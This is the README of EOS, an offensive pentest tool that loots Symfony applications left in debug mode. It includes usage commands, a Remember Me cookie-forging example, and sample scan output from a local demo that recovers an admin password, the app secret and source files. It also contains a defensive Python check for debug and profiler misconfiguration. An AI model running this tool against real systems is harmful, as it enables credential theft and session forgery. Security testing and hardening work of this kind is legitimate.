Enemies Of Symfony - Debug mode Symfony looter

Enemies Of Symfony (EOS)

EOS loots information from a Symfony target in debug mode:

Section        Description
General        Get general information about the target.
Phpinfo        Extract Symfony environment variables from the exposed phpinfo().
Routes         Get the list of registered routes.
Request logs   Look for credentials in POST request logs.
Project files  Retrieve project files (configuration, database, etc.) based on a wordlist.
Sources        Extract the application source code.
Cookies        Craft Remember Me cookies.

More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.

Note that this tool does not exploit any Symfony vulnerability. The profiler is a useful component for developers, and EOS simply takes advantage of misconfigured Symfony applications. In fact, the profiler documentation prominently warns developers:

Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.

Thanks to all the Symfony team for their awesome work!
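A defender-side check for the misconfiguration described above, as an added example (not part of EOS or Symfony): it reads a project's `.env` text and `config/bundles.php` text and reports whether debug mode or the profiler would be active on a production host. The function names and sample inputs are constructed; it assumes the standard Symfony layout where an unset `APP_ENV` means `dev` and debug defaults to on outside `prod`, and it ignores overrides from real environment variables or `.env.local`.

```python
import re

def parse_dotenv(text):
    """Parse .env-style text into a dict, skipping comments and blank lines."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip("'\"")
    return env

def profiler_envs(bundles_php):
    """Environments for which config/bundles.php enables WebProfilerBundle."""
    m = re.search(r"WebProfilerBundle::class\s*=>\s*\[(.*?)\]", bundles_php, re.S)
    pairs = re.findall(r"'(\w+)'\s*=>\s*(true|false)", m.group(1)) if m else []
    return {name for name, flag in pairs if flag == "true"}

def audit(dotenv_text, bundles_php):
    """Return findings for a host that is meant to serve production traffic."""
    env = parse_dotenv(dotenv_text)
    app_env = env.get("APP_ENV") or "dev"  # assumption: unset means dev
    # Assumption: debug defaults to on unless the environment is prod.
    debug = env.get("APP_DEBUG", "0" if app_env == "prod" else "1")
    findings = []
    if app_env != "prod":
        findings.append(f"APP_ENV is '{app_env}', expected 'prod'")
    if debug.lower() not in ("0", "false", ""):
        findings.append("debug mode is on")
    if profiler_envs(bundles_php) & {app_env, "all"}:
        findings.append("WebProfilerBundle is enabled for this environment")
    return findings

# Constructed sample inputs (not taken from a real project).
WEAK_ENV = "APP_ENV=dev\nAPP_SECRET=<placeholder>\n"
HARDENED_ENV = "APP_ENV=prod\nAPP_DEBUG=0\nAPP_SECRET=<placeholder>\n"
BUNDLES = r"""<?php
return [
    Symfony\Bundle\FrameworkBundle\FrameworkBundle::class => ['all' => true],
    Symfony\Bundle\WebProfilerBundle\WebProfilerBundle::class => ['dev' => true, 'test' => true],
];
"""
BUNDLES_ALL = BUNDLES.replace("['dev' => true, 'test' => true]", "['all' => true]")

if __name__ == "__main__":
    for label, dotenv, bundles in [("weak", WEAK_ENV, BUNDLES),
                                   ("hardened", HARDENED_ENV, BUNDLES),
                                   ("prod env, profiler for all", HARDENED_ENV, BUNDLES_ALL)]:
        print(label, "->", audit(dotenv, bundles) or "no findings")
```

The third case shows why checking `APP_ENV` alone is not enough: a bundle registered for `all` is loaded in `prod` as well.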

Installation

Tested on Python >= 3.7.

$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos

Usage

usage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...

  ███████╗ ██████╗ ███████╗
  ██╔════╝██╔═══██╗██╔════╝
  █████╗  ██║   ██║███████╗
  ██╔══╝  ██║   ██║╚════██║
  ███████╗╚██████╔╝███████║  Enemies Of Symfony
  ╚══════╝ ╚═════╝ ╚══════╝  v1.1

positional arguments:
  {scan,sources,get,creds,cookies}
    scan                 perform a full scan
    sources              download application source code
    get                  download a file from the application
    creds                extract credentials from request logs
    cookies              craft remember me cookies with a great lifetime

optional arguments:
  -h, --help             show this help message and exit
  -V, --version          display version info
  -v, --verbose          increase verbosity
  --no-colors            disable colors in output

examples:
  eos scan http://localhost
  eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
  eos get http://localhost config/services.yaml
  eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629

$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day

[+] Info
[!]   Symfony 5.0.1
[!]   PHP 7.3.11-1~deb10u1
[!]   Environment: dev

[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!]   jane_admin: kitten [ROLE_ADMIN]

[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!]   APP_ENV: dev
[!]   APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!]   DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!]   MAILER_URL: null://localhost

[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!]   composer.lock
[!]   composer.json
[!]   config/bundles.php
[!]   config/bootstrap.php
[!]   config/packages/assets.yaml
[!]   config/packages/cache.yaml
[!]   config/packages/dev/debug.yaml
[!]   config/packages/dev/monolog.yaml
[!]   config/packages/dev/routing.yaml
[!]   config/packages/dev/swiftmailer.yaml
[!]   config/packages/dev/web_profiler.yaml
[!]   config/packages/doctrine_migrations.yaml
[!]   config/packages/doctrine.yaml
[!]   config/packages/framework.yaml
[!]   config/packages/html_sanitizer.yaml
[!]   config/packages/prod/doctrine.yaml
[!]   config/packages/prod/monolog.yaml
[!]   config/packages/prod/routing.yaml
[!]   config/packages/prod/webpack_encore.yaml
[!]   config/packages/routing.yaml
[!]   config/packages/security.yaml
[!]   config/packages/sensio_framework_extra.yaml
[!]   config/packages/swiftmailer.yaml
[!]   config/packages/test/dama_doctrine_test_bundle.yaml
[!]   config/packages/test/framework.yaml
[!]   config/packages/test/monolog.yaml
[!]   config/packages/test/routing.yaml
[!]   config/packages/test/security.yaml
[!]   config/packages/test/swiftmailer.yaml
[!]   config/packages/test/twig.yaml
[!]   config/packages/test/validator.yaml
[!]   config/packages/test/webpack_encore.yaml
[!]   config/packages/test/web_profiler.yaml
[!]   config/packages/translation.yaml
[!]   config/packages/twig.yaml
[!]   config/packages/validator.yaml
[!]   config/packages/webpack_encore.yaml
[!]   config/routes/annotations.yaml
[!]   config/routes/dev/framework.yaml
[!]   config/routes/dev/web_profiler.yaml
[!]   config/routes.yaml
[!]   config/services.yaml
[!]   data/database.sqlite
[!]   data/database_test.sqlite
[!]   package.json
[!]   public/index.php
[!]   public/robots.txt
[!]   README.md
[!]   src/Kernel.php
[!]   symfony.lock
[!]   var/cache/dev/url_generating_routes.php
[!]   var/cache/dev/url_matching_routes.php
[!]   var/log/dev.log

[+] Routes
[!] Found the following routes:
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/new
[!]   /{_locale}/admin/post/{id}
[!]   /{_locale}/admin/post/{id}/edit
[!]   /{_locale}/admin/post/{id}/delete
[!]   /{_locale}/blog/
[!]   /{_locale}/blog/rss.xml
[!]   /{_locale}/blog/page/{page}
[!]   /{_locale}/blog/posts/{slug}
[!]   /{_locale}/blog/comment/{postSlug}/new
[!]   /{_locale}/blog/search
[!]   /{_locale}/login
[!]   /{_locale}/logout
[!]   /{_locale}/profile/edit
[!]   /{_locale}/profile/change-password
[!]   /{_locale}

[+] Project sources
[!] Found the following source files:
[!]   src/Command/AddUserCommand.php
[!]   src/Command/DeleteUserCommand.php
[!]   src/Command/ListUsersCommand.php
[!]   src/Controller/Admin/BlogController.php
[!]   src/Controller/BlogController.php
[!]   src/Controller/SecurityController.php
[!]   src/Controller/UserController.php
[!]   src/DataFixtures/AppFixtures.php
[!]   src/Entity/Comment.php
[!]   src/Entity/Post.php
[!]   src/Entity/Tag.php
[!]   src/Entity/User.php
[!]   src/EventSubscriber/CheckRequirementsSubscriber.php
[!]   src/EventSubscriber/CommentNotificationSubscriber.php
[!]   src/EventSubscriber/ControllerSubscriber.php
[!]   src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!]   src/Events/CommentCreatedEvent.php
[!]   src/Form/CommentType.php
[!]   src/Form/DataTransformer/TagArrayToStringTransformer.php
[!]   src/Form/PostType.php
[!]   src/Form/Type/ChangePasswordType.php
[!]   src/Form/Type/DateTimePickerType.php
[!]   src/Form/Type/TagsInputType.php
[!]   src/Form/UserType.php
[!]   src/Kernel.php
[!]   src/Pagination/Paginator.php
[!]   src/Repository/PostRepository.php
[!]   src/Repository/TagRepository.php
[!]   src/Repository/UserRepository.php
[!]   src/Security/PostVoter.php
[!]   src/Twig/AppExtension.php
[!]   src/Twig/SourceCodeExtension.php
[!]   src/Utils/Markdown.php
[!]   src/Utils/MomentFormatConverter.php
[!]   src/Utils/Slugger.php
[!]   src/Utils/Validator.php

[+] Saving files to results
[+] Saved 88 files

[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13
